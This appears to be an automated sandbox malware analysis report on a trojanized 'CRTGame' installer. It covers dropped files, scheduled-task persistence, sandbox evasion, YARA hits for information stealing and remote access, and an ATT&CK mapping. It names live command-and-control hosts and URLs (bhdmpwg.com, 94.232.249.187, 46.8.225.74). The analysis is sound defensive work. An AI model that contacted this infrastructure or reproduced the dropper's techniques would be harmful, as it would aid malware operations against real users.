                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DSQCO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-THT99.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-N90RR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-US51G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-89IOF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9BPGE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5687
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-15169
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376Thread sleep count: 225 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376Thread sleep time: -450000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5540Thread sleep count: 43 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5540Thread sleep time: -2580000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376Thread sleep count: 9675 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 5376Thread sleep time: -19350000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeThread delayed: delay time: 60000Jump to behavior
                  Source: crtgame.exe, 00000007.00000002.3303589391.0000000000837000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3303589391.00000000008C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeAPI call chain: ExitProcess graph end nodegraph_0-6727
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2159
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2399
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_7-15170
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDFBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02BDFBBE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDFBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02BDFBBE
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BC5F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,7_2_02BC5F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD8F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02BD8F28
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD7A6D cpuid 7_2_02BD7A6D
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: GetLocaleInfoA,0_2_004051FC
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: GetLocaleInfoA,0_2_00405248
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: GetLocaleInfoA,1_2_00408570
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: GetLocaleInfoA,1_2_004085BC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 5460, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 5460, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Deobfuscate/Decode Files or Information
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop ProtocolData from Removable Media2
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  23
                  Software Packing
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  NTDS35
                  System Information Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets41
                  Security Software Discovery
                  SSHKeylogging112
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials21
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync11
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Process Injection
                  Proc Filesystem3
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575008 Sample: j9htknb7BQ.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 53 9 other signatures 2->53 8 j9htknb7BQ.exe 2 2->8         started        process3 file4 33 C:\Users\user\AppData\...\j9htknb7BQ.tmp, PE32 8->33 dropped 11 j9htknb7BQ.tmp 17 76 8->11         started        process5 file6 35 C:\Program Files (x86)\CRTGame\crtgame.exe, PE32 11->35 dropped 37 C:\Program Files (x86)\...\is-PA44V.tmp, PE32 11->37 dropped 39 C:\Program Files (x86)\...\is-L2U9S.tmp, PE32 11->39 dropped 41 106 other files (none is malicious) 11->41 dropped 55 Uses schtasks.exe or at.exe to add and modify task schedules 11->55 15 crtgame.exe 1 15 11->15         started        18 net.exe 1 11->18         started        20 crtgame.exe 1 2 11->20         started        23 schtasks.exe 1 11->23         started        signatures7 process8 dnsIp9 43 bhdmpwg.com 94.232.249.187, 49788, 49805, 49808 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 15->43 45 46.8.225.74, 2023, 49795, 49807 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 15->45 25 conhost.exe 18->25         started        27 net1.exe 1 18->27         started        31 C:\ProgramData\SpaceXRaces\SpaceXRaces.exe, PE32 20->31 dropped 29 conhost.exe 23->29         started        file10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  j9htknb7BQ.exe39%ReversingLabsWin32.Trojan.Munp
                  j9htknb7BQ.exe58%VirustotalBrowse
                  j9htknb7BQ.exe100%AviraHEUR/AGEN.1332570
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-0B8UA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-0H0B1.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-15Q83.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-15SLJ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-1GFJF.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-1L7JU.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2DM26.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-4L1QL.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-53LMN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-6AF6U.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-768F1.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-7M8GD.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-89IOF.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-8KTA3.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-9BPGE.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DSQCO.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FLPRF.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-I69V3.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-J4G02.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KJFHV.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-LCCKT.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-LKN3T.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-M9NVL.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-MGR1O.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-N90RR.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-NFQ3O.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-NTP22.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-O2JHA.tmp0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde20%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svnrepository0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunk0%Avira URL Cloudsafe
                  http://bhdmpwg.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb240%Avira URL Cloudsafe
                  http://www.mp3dev.org/ID3Error0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunkrepository0%Avira URL Cloudsafe
                  http://www.mp3dev.org/ID3Error0%VirustotalBrowse
                  http://www.mpg123.de0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunk0%VirustotalBrowse
                  http://lame.sf.net0%Avira URL Cloudsafe
                  http://94.232.0%Avira URL Cloudsafe
                  http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
                  bhdmpwg.com0%Avira URL Cloudsafe
                  http://LosslessAudio.org/00%Avira URL Cloudsafe
                  http://lame.sf.net32bits0%Avira URL Cloudsafe
                  http://www.mp3dev.org/0%Avira URL Cloudsafe
                  http://bhdmpwg.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc0%Avira URL Cloudsafe
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde20%Avira URL Cloudsafe
                  http://ocsps.ssl.com0Q0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bhdmpwg.com
                  94.232.249.187
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://bhdmpwg.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24true
                    • Avira URL Cloud: safe
                    unknown
                    bhdmpwg.comtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://bhdmpwg.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cctrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/j9htknb7BQ.tmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drfalse
                      high
                      https://gcc.gnu.org/bugs/):is-O2JHA.tmp.1.drfalse
                        high
                        http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drfalse
                          high
                          https://mp4v2.googlecode.com/svn/trunkis-U01MD.tmp.1.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://sectigo.com/CPS0is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drfalse
                            high
                            http://ocsp.sectigo.com0is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drfalse
                              high
                              http://www.mp3dev.org/ID3Erroris-MGR1O.tmp.1.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://mp4v2.googlecode.com/svnrepositoryis-U01MD.tmp.1.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsps.ssl.com0is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drfalse
                                high
                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drfalse
                                  high
